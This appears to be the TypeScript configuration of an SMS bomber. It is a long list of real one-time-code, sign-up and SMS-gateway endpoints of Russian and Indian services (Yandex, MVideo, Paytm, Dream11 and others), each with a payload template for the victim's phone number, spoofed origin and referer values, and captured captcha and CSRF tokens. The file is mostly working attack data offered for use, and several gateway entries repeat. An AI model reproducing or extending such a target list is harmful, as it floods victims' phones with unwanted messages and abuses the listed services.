import type { BOMBAPIS } from "../interfaces/interfaces.ts";

let phone: string = '';

function changePhone(newPhone: string): string {
    phone = newPhone;
    return phone;
}

const bombapis: BOMBAPIS = {
    APIs: [
        {
            name: 'Utair',
            url: 'https://b.utair.ru/api/v1/login/',
            payload: {
                login: '',
                confirmation_type: 'standart',
            },
            formate: false,
            origin: 'https://www.utair.ru/',
            referer: 'https://www.utair.ru/',
        },
        {
            name: 'FixPrice',
            url: 'https://api.fix-price.com/buyer/v2/registration/phone/request',
            formate: true,
            payload: {
                phone: '',
            },
            origin: 'https://fix-price.com',
            referer: 'https://fix-price.com',
        },
        {
            name: 'MVideo',
            url: 'https://www.mvideo.ru/bff/auth/v2/otp/send',
            payload: {
                phoneNumber: '',
                sendBy: 'cascade',
            },
            formate: false,
            origin: 'https://www.mvideo.ru',
            referer: 'https://www.mvideo.ru/?pid=yandexdirect_int&c=mg_image_name_p_msk&af_siteid=search_none&af_c_id=81880841&af_adset_id=5114106698&af_ad_id=13328033830&af_ad=%D0%BC%20video&af_sub1=&af_sub2=1&is_retargeting=true&clickid=10088001110945562623&idfa=&google_aid=&android_id=&oaid=&af_reengagement_window=30d&af_force_deeplink=true&af_click_lookback=7d&utm_medium=cpc&utm_source=yandex&utm_campaign=cn:mg_image_name_p_msk|cid:81880841&utm_term=%D0%BC%20video&utm_content=ph:42887098638|re:42887098638|cid:81880841|gid:5114106698|aid:13328033830|adp:no|pos:premium1|src:search_none|dvc:desktop|coef_goal:0|region:10716|%D0%91%D0%B0%D0%BB%D0%B0%D1%88%D0%B8%D1%85%D0%B0&yclid=10088001110945562623',
        },
        {
            name: 'Adamas',
            url: 'https://rest.adamas.ru/v1/phone/send',
            payload: {
                phone: '',
                action: 'auth',
                captcha: '03AFcWeA6bRFb_F7sNR1LNDVRMoBHMGpC5Hfg82U6mkBWp9TBK0l2GYCCQT8x_3iBwTCjC_iqTGIsZ89MNTugukvf0WOx0G4qPChN1gyhgA-j1BeiZ1p6cOhAZ_QJPdGrTMsCYydffeG6sgDNysOi1xgiMh8d5LVhyjs84e0YAKI8GSpPiTX-rG_Jf_0BRxLsytv9e7apBxcS75BKw0MGppqefCpNkrAg1RrgBISyaLU1fiKvaBn8tz9GK8vEQ0fgcgyNkl1ZEGUQtcugJi3VlpUKgELiMQXOWOwrVvKeMGfBVV7ShQhOgOAsz_n4b9aFz01SA4kGO9_QYbe6e4ST5t987ekqhqfHCkdhDkJCo48Ek8nGO5JEssFoOeKTEv3_bgxhSREzzC24H5rFqj4j9lFssTQeiVX7IzJyOd8Bm_a-xp262-8b31y71eOwhTArFYwj0BD_FWIKgIBCJP4bv4XxCxVwwDkugOJH6_Ft9y9Cz4hfVA7wu_0S9axoy-qTnfw4nK8NZ38S8ctnYENwvtuXhjSKkSKYPRFk4eM8MVMAw2pIs_NBUvXxV8HKhRnDO3kLlBe17yeDggTVv0ZZ4hrQbCXnudogCdVLEy_L2luzfP7CPVSHUovBayRUReNax4W_gvsl8M9s_5iv2clTw4CxrumxnIiJ_MklPewyz95JKkuWmzjWcMRCHjqdsCNubSMZl9cI-02E1T5MP7q3YYeAEPDijau7mhsvUu69XBdZ4syII-o5trOCyAt_sTYnsG9e7OMeB1dplnYyRD_x0jMoQQcuyDM0Hrfoxs741F7u3O-szgS3F5iAzRPD2WAhYzXZw8v67FRhGHVjfgsVB7OqihFakgF-JZFIrx9DjJDxXUxKUPrVrlC72Gr4c4NdtZH5S2m-Ikf0ycC009bqfhiOvTcDN1Bb9sg'
            },
            formate: false,
            slice: true,
            origin: 'https://adamas.ru',
            referer: 'https://adamas.ru/'
        },
        {
            name: 'Yandex',
            url: 'https://passport.yandex.ru/registration-validations/auth/multi_step/start',
            payload: {
                login: '',
                csrf_token: '37b245e2f9150748cf18cb7624868218b4877fd4:1740085412749',
                process_uuid: '87d417ad-8a6d-4b3b-a8e8-b0654925f0e3',
                retpath: 'https://sso.passport.yandex.ru/prepare?uuid=b5378a18-00a0-4bef-8582-ac23a8863488&goal=https%3A%2F%2Fya.ru%2F&finish=https%3A%2F%2Feda.yandex.ru%2Fmoscow%2Fr%2Fvkusnoitochka%3Fauth_from%3Dside_menu',
                origin: 'eda.yandex.ru',
                check_for_xtokens_for_pictures: 1,
                can_send_push_code: 1,
            },
            formate: false,
            origin: 'https://passport.yandex.ru',
            referer: 'https://passport.yandex.ru/',
        },
        {
            name: 'Lenta',
            url: 'https://lenta.com/api-gateway/v1/auth/code/send',
            payload: {
                phone: '',
                acceptMarketingCommunications: true,
                kfpVn: null,
                kfpKsid: 'fa065c24-5774-4a90-ab0f-a7f44ba7a4a6',
            },
            formate: false,
            origin: 'https://lenta.com',
            referer: 'https://lenta.com/',
        },
        {
            name: 'Smotrim',
            url: 'https://smotrim.ru/personal/login?redirect=%2Fpersonal%2Fpayment-choice%3Fplan%3Dsmotrim_annual%26redirect%3D%252Ftariffs',
            payload: {
                phone: '',
                redirect: '/personal/payment-choice?plan=smotrim_annual&redirect=%2Ftariffs',
                _token: 'APZHu4PKeujiv2v5JvgJjt1MeZaj95M0KfnhcE3W',
            },
            formate: false,
            origin: 'https://smotrim.ru',
            referer: 'https://smotrim.ru/personal/login?redirect=%2Fpersonal%2Fpayment-choice%3Fplan%3Dsmotrim_annual%26redirect%3D%252Ftariffs',
        },
        {
            name: 'Rutube',
            url: 'https://rutube.ru/multipass/api/v3/accounts/phone/register/',
            payload: {
                phone: '',
                agreements: {
                    agree_personal_data: true,
                    agree_user_agreement: true
                },
                captcha: 'dD0xNzQwMDg2MDY2O2k9OTUuMTY1LjE0OC4xNzk7RD0zNjI2NERENThCMjRBNTkwMjI3MDdGMDIzMzI2MjNFOUVGN0Q2NUYxNzA4MzU5Qzg4MzkyRjU1MDk1Njc2M0IwMzdGQ0E2Q0E3REUxMzUzQTg1RkEzN0Q2NjE3QTM0OTAyMDcwOUNEMTY0MDA0RThBQzJBREIzMTcyQkVCODY0MjIzOTlBOEY5Q0U5OTFGM0VCNzc5MzA3QTUyNjJFN0IxQzREREZCMUVBQjFEMkQwMzQ3QjM5NTt1PTE3NDAwODYwNjY0NjgyMDYzOTU7aD00OGY1NDE1NDQ0NzI4ZGJiNDIyZGIwYjMyNjg0Y2UwYw==',
                send_method: 'sms',
            },
            formate: false,
            origin: 'https://rutube.ru',
            referer: 'https://rutube.ru/multipass/login/?client=wdp&snake-closable=true&referer=https%3A%2F%2Frutube.ru%2F%3Fysclid%3Dm7du9gf35u752997581&themeId=dark2021&snake-startForm=login',
        },
        {
            name: 'CDEK',
            url: 'https://sso.cdek.ru/auth/realms/b2c/login-actions/authenticate?session_code=Md0YcVCZ4BrzFnZwvpFJx9hxrSrsjOR1IGUNeU4bFiE&;execution=c03c4198-17a1-4b2a-ac18-b54ebeed6882&;client_id=web-cdek-ru&;tab_id=_kKMwHyzSao&;client_data=eyJydSI6Imh0dHBzOi8vd3d3LmNkZWsucnUvcmVzb2x2ZXIvP2xvY2FsZT1ydSIsInJ0IjoiY29kZSIsInJtIjoiZnJhZ21lbnQiLCJzdCI6ImMwNzBjMjVmLWViNzEtNDZlMy04YjBmLTYyN2JkOGJlYTgzNSJ9',
            payload: {
                username: '',
                rememberMe: 'on',
                'cdek-captcha-text': 'bhjh',
                'cdek-captcha-uuid': '3befc678-94b4-41b0-8666-c1793665e038'
            },
            formate: false,
            origin: 'https://sso.cdek.ru',
            referer: 'https://sso.cdek.ru/auth/realms/b2c/login-actions/authenticate',
        },
        {
            name: 'ConfirmTKT',
            url: 'https://securedapi.confirmtkt.com/api/platform/register?newOtp=true&mobileNumber=',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.confirmtkt.com',
            referer: 'https://www.confirmtkt.com/',
        },
        {
            name: 'JustDial',
            url: 'https://t.justdial.com/api/india_api_write/18july2018/sendvcode.php?mobile=',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.justdial.com',
            referer: 'https://www.justdial.com/',
        },
        {
            name: 'Frotels',
            url: 'https://www.frotels.com/appsendsms.php',
            payload: {
                mobno: '',
            },
            formate: false,
            origin: 'https://www.frotels.com',
            referer: 'https://www.frotels.com/',
        },
        {
            name: 'Gapoon',
            url: 'https://www.gapoon.com/userSignup',
            payload: {
                mobile: '',
                email: 'a@a.com',
                name: 'a',
            },
            formate: false,
            origin: 'https://www.gapoon.com',
            referer: 'https://www.gapoon.com/',
        },
        {
            name: 'Housing',
            url: 'https://login.housing.com/api/v2/send-otp',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://housing.com',
            referer: 'https://housing.com/',
        },
        {
            name: 'Porter',
            url: 'https://porter.in/restservice/send_app_link_sms',
            payload: {
                phone: '',
                referrer_string: '',
                brand: 'porter',
            },
            formate: false,
            origin: 'https://porter.in',
            referer: 'https://porter.in/',
        },
        {
            name: 'CityFlo',
            url: 'https://cityflo.com/website-app-download-link-sms/',
            payload: {
                mobile_number: '',
            },
            formate: false,
            origin: 'https://cityflo.com',
            referer: 'https://cityflo.com/',
        },
        {
            name: 'NNNow',
            url: 'https://api.nnnow.com/d/api/appDownloadLink',
            payload: {
                mobileNumber: '',
            },
            formate: false,
            origin: 'https://www.nnnow.com',
            referer: 'https://www.nnnow.com/',
        },
        {
            name: 'Ajio',
            url: 'https://login.web.ajio.com/api/auth/signupSendOTP',
            payload: {
                mobileNumber: '',
                firstName: 'xxps',
                login: 'wiqpdl223@wqew.com',
                password: 'QASpw@1s',
                genderType: 'Male',
                requestType: 'SENDOTP',
            },
            formate: false,
            origin: 'https://www.ajio.com',
            referer: 'https://www.ajio.com/',
        },
        {
            name: 'HappyEasyGo',
            url: 'https://www.happyeasygo.com/heg_api/user/sendRegisterOTP.do?phone=91%20',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.happyeasygo.com',
            referer: 'https://www.happyeasygo.com/',
        },
        {
            name: 'Unacademy',
            url: 'https://unacademy.com/api/v1/user/get_app_link/',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://unacademy.com',
            referer: 'https://unacademy.com/',
        },
        {
            name: 'Treebo',
            url: 'https://www.treebo.com/api/v2/auth/login/otp/',
            payload: {
                phone_number: '',
            },
            formate: false,
            origin: 'https://www.treebo.com',
            referer: 'https://www.treebo.com/',
        },
        {
            name: 'Mobikwik',
            url: 'https://webapi.mobikwik.com/p/account/otp/cell/v2',
            payload: {
                cell: '',
            },
            formate: false,
            origin: 'https://www.mobikwik.com',
            referer: 'https://www.mobikwik.com/',
        },
        {
            name: 'Airtel',
            url: 'https://www.airtel.in/referral-api/core/notify?messageId=map&rtn=',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.airtel.in',
            referer: 'https://www.airtel.in/',
        },
        {
            name: 'PharmEasy',
            url: 'https://pharmeasy.in/api/auth/requestOTP',
            payload: {
                contactNumber: '',
            },
            formate: false,
            origin: 'https://pharmeasy.in',
            referer: 'https://pharmeasy.in/',
        },
        {
            name: 'MylesCars',
            url: 'https://www.mylescars.com/usermanagements/chkContact',
            payload: {
                contactNo: '',
            },
            formate: false,
            origin: 'https://www.mylescars.com',
            referer: 'https://www.mylescars.com/',
        },
        {
            name: 'Grofers',
            url: 'https://grofers.com/v2/accounts/',
            payload: {
                user_phone: '',
            },
            formate: false,
            origin: 'https://grofers.com',
            referer: 'https://grofers.com/',
        },
        {
            name: 'Dream11',
            url: 'https://api.dream11.com/sendsmslink',
            payload: {
                mobileNum: '',
                siteId: '1',
                appType: 'androidfull',
            },
            formate: false,
            origin: 'https://www.dream11.com',
            referer: 'https://www.dream11.com/',
        },
        {
            name: 'Cashify',
            url: 'https://www.cashify.in/api/cu01/v1/app-link?mn=',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.cashify.in',
            referer: 'https://www.cashify.in/',
        },
        {
            name: 'Paytm',
            url: 'https://commonfront.paytm.com/v4/api/sendsms',
            payload: {
                phone: '',
                guid: '2952fa812660c58dc160ca6c9894221d',
            },
            formate: false,
            origin: 'https://paytm.com',
            referer: 'https://paytm.com/',
        },
        {
            name: 'Aramba',
            url: 'http://www.aramba.ru/core.php',
            payload: {
                phone: '',
                act: 'codeRequest',
                l: '',
                p: '',
                name: '',
                email: '',
            },
            formate: false,
            origin: 'http://www.aramba.ru',
            referer: 'http://www.aramba.ru/',
        },
        {
            name: 'BelkaCar',
            url: 'https://belkacar.ru/get-confirmation-code',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://belkacar.ru',
            referer: 'https://belkacar.ru/',
        },
        {
            name: 'Citilink',
            url: 'https://www.citilink.ru/registration/confirm/phone/',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://www.citilink.ru',
            referer: 'https://www.citilink.ru/',
        },
        {
            name: 'Denga',
            url: 'https://online.denga.ru/admin/api/json/registration',
            payload: {
                phone: '',
                email: '',
                password: '12345678',
                passwordConfirmation: '12345678',
            },
            formate: false,
            origin: 'https://online.denga.ru',
            referer: 'https://online.denga.ru/',
        },
        {
            name: 'DoZarplati',
            url: 'https://online-api.dozarplati.com/rpc',
            payload: {
                phoneNumber: '',
                id: 1,
                jsonrpc: '2.0',
                method: 'auth.login',
            },
            formate: false,
            origin: 'https://online-api.dozarplati.com',
            referer: 'https://online-api.dozarplati.com/',
        },
        {
            name: 'DrugVokrug',
            url: 'https://drugvokrug.ru/siteActions/processSms.htm',
            payload: {
                cell: '',
            },
            formate: false,
            origin: 'https://drugvokrug.ru',
            referer: 'https://drugvokrug.ru/',
        },
        {
            name: 'FastMoney',
            url: 'https://fastmoney.ru/auth/registration',
            payload: {
                phone: '',
                'RegistrationForm[username]': '',
                'RegistrationForm[password]': '12345',
                'RegistrationForm[confirmPassword]': '12345',
                'yt0': 'Регистрация',
            },
            formate: false,
            origin: 'https://fastmoney.ru',
            referer: 'https://fastmoney.ru/',
        },
        {
            name: 'FindClone',
            url: 'https://findclone.ru/register',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://findclone.ru',
            referer: 'https://findclone.ru/',
        },
        {
            name: 'Gorzdrav',
            url: 'https://gorzdrav.org/login/register/sms/send',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://gorzdrav.org',
            referer: 'https://gorzdrav.org/',
        },
        {
            name: 'Iqos',
            url: 'https://ube.pmsm.org.ru/esb/iqos-reg/submission',
            payload: {
                phone: '',
                data: {
                    firstName: '',
                    lastName: 'Иванов',
                    email: '',
                    password: 'ivanov17',
                    passwordConfirm: 'ivanov17',
                },
            },
            formate: false,
            origin: 'https://ube.pmsm.org.ru',
            referer: 'https://ube.pmsm.org.ru/',
        },
        {
            name: 'Karusel',
            url: 'https://app.karusel.ru/api/v1/phone/',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://app.karusel.ru',
            referer: 'https://app.karusel.ru/',
        },
        {
            name: 'McDonalds',
            url: 'https://mcdonalds.ru/api/auth/code',
            payload: {
                phone: '',
            },
            formate: false,
            origin: 'https://mcdonalds.ru',
            referer: 'https://mcdonalds.ru/',
        },
        {
            name: 'MisterCat',
            url: 'https://mistercat.com.ua/index.php',
            payload: {
                phone: '',
                option: 'com_ksenmart',
                view: 'profile',
                task: 'profile.sms_auth',
                tmpl: 'ksenmart',
                type: 'send',
            },
            formate: false,
            origin: 'https://mistercat.com.ua',
            referer: 'https://mistercat.com.ua/',
        },
        {
            name: 'MTS',
            url: 'https://api.mtstv.ru/v1/users',
            payload: {
                msisdn: '',
            },
            formate: false,
            origin: 'https://api.mtstv.ru',
            referer: 'https://api.mtstv.ru/',
        },
        {
            name: 'NewNext',
            url: 'https://newnext.ru/graphql',
            payload: {
                phone: '',
                operationName: 'registration',
                variables: {
                    client: {
                        firstName: 'Иван',
                        lastName: 'Иванов',
                        phone: '',
                        typeKeys: ['Unemployed'],
                    },
                },
                query: `mutation registration($client: ClientInput!) {
                  registration(client: $client) {
                    token
                    __typename
                  }
                }`,
            },
            formate: false,
            origin: 'https://newnext.ru',
            referer: 'https://newnext.ru/',
        },
        {
            name: 'Unisender',
            url: 'https://api.unisender.com/ru/api/sendSms',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://www.unisender.com',
            referer: 'https://www.unisender.com/',
        },
        {
            name: 'SMS Aero',
            url: 'https://gate.smsaero.ru/v2/sms/send',
            payload: {
                number: '',
                text: '',
                sign: '',
                channel: 'DIRECT',
            },
            formate: false,
            origin: 'https://smsaero.ru',
            referer: 'https://smsaero.ru/',
        },
        {
            name: 'ePochta SMS',
            url: 'https://api.epochta.ru/v1/json/sms/send',
            payload: {
                phone: '',
                sender: '',
                text: '',
            },
            formate: false,
            origin: 'https://www.epochta.ru',
            referer: 'https://www.epochta.ru/',
        },
        {
            name: 'MTS Exolve',
            url: 'https://api.exolve.ru/v1/sms/send',
            payload: {
                msisdn: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://www.exolve.ru',
            referer: 'https://www.exolve.ru/',
        },
        {
            name: 'SMS Центр',
            url: 'https://smsc.ru/sys/send.php',
            payload: {
                phones: '',
                mes: '',
                sender: '',
                fmt: 3,
            },
            formate: false,
            origin: 'https://smsc.ru',
            referer: 'https://smsc.ru/',
        },
        {
            name: 'ProstorSMS',
            url: 'https://api.prostorsms.ru/messages/v2/send.json',
            payload: {
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://www.prostorsms.ru',
            referer: 'https://www.prostorsms.ru/',
        },
        {
            name: 'SMSint',
            url: 'https://lcab.smsint.ru/json/v1.0/sms/send',
            payload: {
                recipient: '',
                'sender': '',
                'text': '',
            },
            formate: false,
            origin: 'https://www.smsint.ru',
            referer: 'https://www.smsint.ru/',
        },
        {
            name: 'SMS-PROSTO.RU',
            url: 'https://api.sms-prosto.ru/send/',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sms-prosto.ru',
            referer: 'https://sms-prosto.ru/',
        },
        {
            name: 'SMSRU',
            url: 'https://sms.ru/sms/send',
            payload: {
                to: '',
                msg: '',
                from: '',
                json: 1,
            },
            formate: false,
            origin: 'https://sms.ru',
            referer: 'https://sms.ru/',
        },
        {
            name: 'SMS Победа',
            url: 'https://api.smspobeda.com/send/',
            payload: {
                to: '',
                text: '',
                from: '',
            },
            formate: false,
            origin: 'https://smspobeda.com',
            referer: 'https://smspobeda.com/',
        },
        {
            name: 'SMSProfi',
            url: 'https://api.smsprofi.ru/send/',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://smsprofi.ru',
            referer: 'https://smsprofi.ru/',
        },
        {
            name: 'ProntoSMS',
            url: 'https://api.prontosms.ru/send/',
            payload: {
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://prontosms.ru',
            referer: 'https://prontosms.ru/',
        },
        {
            name: 'СМС услуги',
            url: 'https://api.sms-uslugi.ru/send/',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sms-uslugi.ru',
            referer: 'https://sms-uslugi.ru/',
        },
        {
            name: 'SIGMA messaging',
            url: 'https://api.sigma-messaging.ru/send/',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sigma-messaging.ru',
            referer: 'https://sigma-messaging.ru/',
        },
        {
            name: 'Tele2',
            url: 'https://target.tele2.ru/api/send',
            payload: {
                msisdn: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://target.tele2.ru',
            referer: 'https://target.tele2.ru/',
        },
        {
            name: 'i-Digital',
            url: 'https://api.i-digital.com/send',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://i-digital.com',
            referer: 'https://i-digital.com/',
        },
        {
            name: 'TargetSMS',
            url: 'https://api.targetsms.ru/send',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://targetsms.ru',
            referer: 'https://targetsms.ru/',
        },
        {
            name: '1000SMS.RU',
            url: 'https://api.1000sms.ru/send',
            payload: {
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://1000sms.ru',
            referer: 'https://1000sms.ru/',
        },
        {
            name: 'SMS Aero',
            url: 'https://gate.smsaero.ru/v2/sms/send',
            payload: {
                number: '',
                text: 'Ваш код подтверждения: {code}',
                sign: 'SMS Aero',
                channel: 'DIRECT',
            },
            formate: false,
            origin: 'https://smsaero.ru',
            referer: 'https://smsaero.ru/',
        },
        {
            name: 'ePochta SMS',
            url: 'https://api.epochta.ru/v1/json/sms/send',
            payload: {
                phone: '',
                sender: 'ePochta',
                text: 'Ваш код подтверждения: {code}',
            },
            formate: false,
            origin: 'https://www.epochta.ru',
            referer: 'https://www.epochta.ru/',
        },
        {
            name: 'SMS Центр',
            url: 'https://smsc.ru/sys/send.php',
            payload: {
                phones: '',
                mes: 'Ваш код подтверждения: {code}',
                sender: 'SMS Центр',
                fmt: 3,
                charset: 'utf-8',
            },
            formate: false,
            origin: 'https://smsc.ru',
            referer: 'https://smsc.ru/',
        },
        {
            name: 'NotiSend',
            url: 'https://api.notisend.ru/v1/send',
            payload: {
                phone: '',
                message: 'Ваш код подтверждения: {code}',
                sender: 'NotiSend',
            },
            formate: false,
            origin: 'https://notisend.ru',
            referer: 'https://notisend.ru/',
        },
        {
            name: 'SigmaSMS',
            url: 'https://api.sigmasms.ru/messages/v2/send/',
            payload: {
                recipients: [''],
                text: 'Ваш код подтверждения: {code}',
                sender: 'SigmaSMS',
            },
            formate: false,
            origin: 'https://sigmasms.ru',
            referer: 'https://sigmasms.ru/',
        },
        {
            name: 'SMS Aero',
            url: 'https://gate.smsaero.ru/v2/sms/send',
            payload: {
                number: '',
                text: '',
                sign: 'SMS Aero',
                channel: 'DIRECT',
            },
            formate: false,
            origin: 'https://smsaero.ru',
            referer: 'https://smsaero.ru/',
        },
        {
            name: 'SMS Traffic',
            url: 'https://api.smstraffic.ru/multi.php',
            payload: {
                login: '',
                password: '',
                phones: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://www.smstraffic.ru',
            referer: 'https://www.smstraffic.ru/',
        },
        {
            name: 'P1SMS',
            url: 'https://api.p1sms.ru/messages/v2/send.json',
            payload: {
                api_key: '',
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://p1sms.ru',
            referer: 'https://p1sms.ru/',
        },
        {
            name: 'Unisender',
            url: 'https://api.unisender.com/ru/api/sendSms',
            payload: {
                api_key: '',
                phone: '',
                sender: '',
                text: '',
            },
            formate: false,
            origin: 'https://www.unisender.com',
            referer: 'https://www.unisender.com/',
        },
        {
            name: 'MTS Exolve',
            url: 'https://api.exolve.ru/v1/sms/send',
            payload: {
                api_key: '',
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://exolve.ru',
            referer: 'https://exolve.ru/',
        },
        {
            name: 'SMS-Prosto',
            url: 'https://api.sms-prosto.ru/send/',
            payload: {
                api_key: '',
                to: '',
                message: '',
                from: '',
            },
            formate: false,
            origin: 'https://sms-prosto.ru',
            referer: 'https://sms-prosto.ru/',
        },
        {
            name: 'SMS Центр',
            url: 'https://smsc.ru/sys/send.php',
            payload: {
                login: '',
                psw: '',
                phones: '',
                mes: '',
                sender: '',
            },
            formate: false,
            origin: 'https://smsc.ru',
            referer: 'https://smsc.ru/',
        },
        {
            name: 'TeraSMS',
            url: 'https://auth.terasms.ru/outbox/send/',
            payload: {
                api_key: '',
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://terasms.ru',
            referer: 'https://terasms.ru/',
        },
        {
            name: 'SMSint',
            url: 'https://api.smsint.ru/send',
            payload: {
                api_key: '',
                to: '',
                message: '',
                from: '',
            },
            formate: false,
            origin: 'https://smsint.ru',
            referer: 'https://smsint.ru/',
        },
        {
            name: 'Mango Office',
            url: 'https://app.mango-office.ru/api/v2/sms',
            payload: {
                from_extension: '',
                to_number: '',
                text: '',
            },
            formate: false,
            origin: 'https://www.mango-office.ru',
            referer: 'https://www.mango-office.ru/',
        },
        {
            name: 'ePochta SMS',
            url: 'https://api.epochta.com/v1/sms/send',
            payload: {
                public_key: '',
                phone: '',
                sender: '',
                text: '',
            },
            formate: false,
            origin: 'https://www.epochta.ru',
            referer: 'https://www.epochta.ru/',
        },
        {
            name: 'SMS.RU',
            url: 'https://sms.ru/sms/send',
            payload: {
                api_id: '',
                to: '',
                msg: '',
                from: '',
            },
            formate: false,
            origin: 'https://sms.ru',
            referer: 'https://sms.ru/',
        },
        {
            name: 'SMS-Fly',
            url: 'https://sms-fly.com/api/api.php',
            payload: {
                login: '',
                password: '',
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sms-fly.com',
            referer: 'https://sms-fly.com/',
        },
        {
            name: 'SMS-Targeting',
            url: 'https://api.sms-targeting.ru/messages/v1/send',
            payload: {
                api_key: '',
                phone: '',
                text: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sms-targeting.ru',
            referer: 'https://sms-targeting.ru/',
        },
        {
            name: 'SMS-Online',
            url: 'https://api.sms-online.com/send/',
            payload: {
                api_key: '',
                to: '',
                message: '',
                from: '',
            },
            formate: false,
            origin: 'https://sms-online.com',
            referer: 'https://sms-online.com/',
        },
        {
            name: 'SMS-Global',
            url: 'https://api.smsglobal.com/v2/sms/',
            payload: {
                api_key: '',
                to: '',
                message: '',
                from: '',
            },
            formate: false,
            origin: 'https://smsglobal.com',
            referer: 'https://smsglobal.com/',
        },
        {
            name: 'SMS-Activate',
            url: 'https://sms-activate.ru/api/api.php',
            payload: {
                api_key: '',
                action: 'send',
                phone: '',
                message: '',
                sender: '',
            },
            formate: false,
            origin: 'https://sms-activate.ru',
            referer: 'https://sms-activate.ru/',
        },
        {
            name: 'SMS-Club',
            url: 'https://api.smsclub.mobi/sms/send',
            payload: {
                username: '',
                token: '',
                to: '',
                message: '',
                from: '',
            },
            formate: false,
            origin: 'https://smsclub.mobi',
            referer: 'https://smsclub.mobi/',
        },
    ],
    headers: {
        'Content-Type': 'application/json',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36',
        'x-key': '189f9c62ea1b55ef9562b115f42dce28',
        'x-city': '3',
        'x-language': 'ru',
        'Origin': '',
        'Referer': '',
    },
};

export function formatePhone(phone) {
    return `${phone.slice(0, 2)}(${phone.slice(2, 5)})-${phone.slice(5, 8)}-${phone.slice(8, 10)}-${phone.slice(10, 12)}`
}

export function slicePhone(phone) {
    return phone.slice(2, 12);
}

export { changePhone, bombapis };